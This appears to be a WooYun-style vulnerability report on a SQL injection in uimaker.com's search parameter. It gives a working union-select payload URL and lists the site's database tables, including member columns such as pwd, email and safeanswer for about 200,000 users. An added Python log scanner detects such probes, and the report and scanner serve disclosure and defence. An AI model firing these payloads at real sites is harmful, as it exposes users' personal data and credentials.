2015-07-09: Details have been sent to the vendor and are awaiting the vendor's handling.
2015-07-14: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Injection parameter: q
Payload: http://www.uimaker.com/search.php?q=99999.9'+union+all+select+1,2,3,4,5,6,7,concat(0x7e,0x21,database(),0x21,0x7e,version(),0x21),8,9,10,11,12,13,14,15,16,17,18,19--+a&=
dede_member (row count: 89236): mid, mtype, userid, pwd, uname, sex, rank, uptime, exptime, money, email, scores, matt, spacesta, face, safequestion, safeanswer, jointime, joinip, logintime, loginip, checkmail, new_zhiye, new_sheng, new_shi, new_birthday, new_school, new_site, new_QQ, fromid, fromuser, fromzt, fromurl
dede_member_person (row count: 95896): mid, onlynet, sex, uname, qq, msn, tel, mobile, place, oldplace, birthday, star, income, education, height, bodytype, blood, vocation, smoke, marital, house, drink, datingtype, language, nature, lovemsg, address, uptime
As can be seen, the number of affected users is close to 200,000 (20W). Part of the users' profile data follows.
Partial database table structure:
Database a0504100607, tables: dede_addonarticle, dede_addonimages, dede_addoninfos, dede_addonshop, dede_addonsoft, dede_addonspec, dede_admin, dede_admintype, dede_advancedsearch, dede_arcatt, dede_arccache, dede_archives, dede_arcmulti, dede_arcrank, dede_arctiny, dede_arctype, dede_area, dede_ask, dede_askanswer, dede_asktype, dede_channeltype, dede_co_htmls, dede_co_mediaurls, dede_co_note, dede_co_onepage, dede_co_urls, dede_diyforms, dede_log, dede_mail_order, dede_mail_title, dede_member, dede_member_company, dede_member_feed, dede_member_fensi, dede_member_flink, dede_member_friends, dede_member_group, dede_member_guestbook, dede_member_model, dede_member_msg, dede_member_operation, dede_member_person, dede_member_pms, dede_member_qzonelogin, dede_member_snsmsg, dede_member_space, dede_member_stow, dede_member_stowtype, dede_member_tj, dede_member_type, dede_member_ub, dede_member_vhistory, dede_member_xly, dede_moneycard_record, dede_moneycard_type, dede_mtypes, dede_multiserv_config, dede_myad, dede_myadtype, dede_mytag, dede_payment, dede_plus, dede_purview, dede_pwd_tmp, dede_ratings, dede_search_cache, dede_search_keywords, dede_sgpage, dede_shops_delivery, dede_shops_orders, dede_shops_paytype, dede_shops_products, dede_shops_userinfo, dede_softconfig, dede_sphinx, dede_stepselect, dede_surplus_log, dede_sys_enum, dede_sys_module, dede_sys_set, dede_sys_task, dede_sysconfig, dede_tagindex, dede_taglist
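The probe above has the classic union-based shape (a quoted search term, `union all select`, `concat()` with hex literals, `database()` and `version()` calls, and a trailing `--` comment). Such requests are easy to spot in web server access logs, which is how a site operator would notice this kind of probing before a dump happens. The following is an added example, not part of the original report: a small Python scanner that parses constructed Apache/Nginx-style access log lines (sample data built here, not taken from the site), URL-decodes every query parameter, and flags the SQL injection indicators seen in the report, then counts which client addresses are repeatedly probing.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines (not from the report). Lines 2 and 4 mirror
# the union-based probe shape shown above; lines 1 and 3 are benign searches,
# including one that contains the word "union" without being an injection.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jul/2015:10:00:01 +0800] "GET /search.php?q=logo+design HTTP/1.1" 200 5123
203.0.113.7 - - [09/Jul/2015:10:00:09 +0800] "GET /search.php?q=99999.9'+union+all+select+1,2,3,concat(0x7e,database(),0x7e,version()),4--+a HTTP/1.1" 200 7411
203.0.113.9 - - [09/Jul/2015:10:00:15 +0800] "GET /search.php?q=union+station HTTP/1.1" 200 4980
203.0.113.7 - - [09/Jul/2015:10:00:21 +0800] "GET /search.php?q=99999.9'+and+1=2+union+select+1,2,3,4,5,6--+ HTTP/1.1" 200 7391
"""

# Combined-log-format line: client, identity, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Indicators applied to each decoded, lowercased, whitespace-collapsed parameter value.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "quote_comment": re.compile(r"'.*?(--|#|/\*)"),
    "info_function": re.compile(r"\b(database|version|user)\s*\(\s*\)"),
    "concat_hex": re.compile(r"\bconcat\s*\(.*0x[0-9a-f]+"),
}


def flag_request(line):
    """Return a finding dict for a log line whose query parameters match any
    indicator, or None for lines that parse cleanly and look benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; a second unquote catches double-encoded payloads.
        norm = re.sub(r"\s+", " ", unquote_plus(value)).lower()
        matched = sorted(key for key, rx in INDICATORS.items() if rx.search(norm))
        if matched:
            hits.append({"param": name, "indicators": matched})
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path, "hits": hits}


def scan_log(text):
    """Scan a whole log text and return the list of findings in log order."""
    return [f for f in (flag_request(line) for line in text.splitlines()) if f]


def probing_ips(findings, threshold=2):
    """Client addresses with at least `threshold` flagged requests."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for r in results:
        print(r["ip"], r["path"], r["hits"])
    print("repeat probers:", probing_ips(results))
```

The patterns are indicators, not proof: a search for a phrase like `it's #1` would trip `quote_comment`, so in practice the union and information-function indicators carry the weight and the rest are used for scoring. Decoding the parameter value before matching matters because `+` and percent-encoding are exactly what hides `union all select` from a naive substring search on the raw request line.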
Severity level: No impact (vendor ignored)
Ignored at: 2015-07-14 15:58
Vulnerability Rank: 4 (WooYun rating)
Vendor response: none yet.